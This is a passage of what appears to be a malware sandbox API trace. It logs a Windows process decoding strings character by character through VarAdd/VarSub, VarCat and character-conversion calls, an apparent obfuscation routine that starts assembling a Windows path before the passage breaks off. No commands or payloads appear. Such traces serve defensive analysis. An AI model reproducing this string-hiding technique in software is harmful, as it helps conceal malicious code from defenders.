VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0178.879] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.880] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x10ef614, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.880] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.881] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x10ef8bc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0178.881] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.882] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.882] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.882] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x10ef614, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.883] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.883] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x10ef8bc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0178.884] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.884] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.884] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.885] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x10ef614, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0178.891] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.891] VarAdd (in: pvarLeft=0x28f9ac, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10ef8bc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.892] VarCat (in: pvarLeft=0x28f9fc, pvarRight=0x28f97c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.893] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0178.893] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.894] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x10ef664, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0178.894] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.894] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x10ef77c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.895] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.895] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0178.896] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.896] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x10ef664, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0178.897] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.897] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x10ef77c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0178.897] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28fa0c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.898] VarAdd (in: pvarLeft=0x28fa74, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0178.899] VarCat (in: pvarLeft=0x28f9cc, pvarRight=0x28f98c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.899] VarAdd (in: pvarLeft=0x28fa74, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x10ee9fc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0178.899] VarCat (in: pvarLeft=0x28f9cc, pvarRight=0x28f98c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.900] VarAdd (in: pvarLeft=0x28fa74, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.900] VarCat (in: pvarLeft=0x28f9cc, pvarRight=0x28f98c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.906] VarAdd (in: pvarLeft=0x28fa74, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x10ef7f4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0178.906] VarCat (in: pvarLeft=0x28f9cc, pvarRight=0x28f98c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.907] VarAdd (in: pvarLeft=0x28fa74, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x10ee9fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.907] VarCat (in: pvarLeft=0x28f9cc, pvarRight=0x28f98c, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.908] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x10f7c04, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0178.908] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.909] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x10f7c2c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.909] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.910] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x10f7c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.910] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.911] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x10f7c04, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.911] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.912] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x10f7c2c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.912] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.912] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x10f7c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.913] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.913] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x10f7c04, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0178.913] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.914] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10f7c2c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.914] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.915] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x10f7c54, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0178.915] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.916] VarAdd (in: pvarLeft=0x28fa84, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10f7c04, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.916] VarCat (in: pvarLeft=0x28fa54, pvarRight=0x28fa44, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.974] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x10f7c2c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0178.975] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.975] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0178.975] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.976] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0178.976] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.977] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x10f7c2c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.977] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.978] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0178.978] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.978] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.979] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.984] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 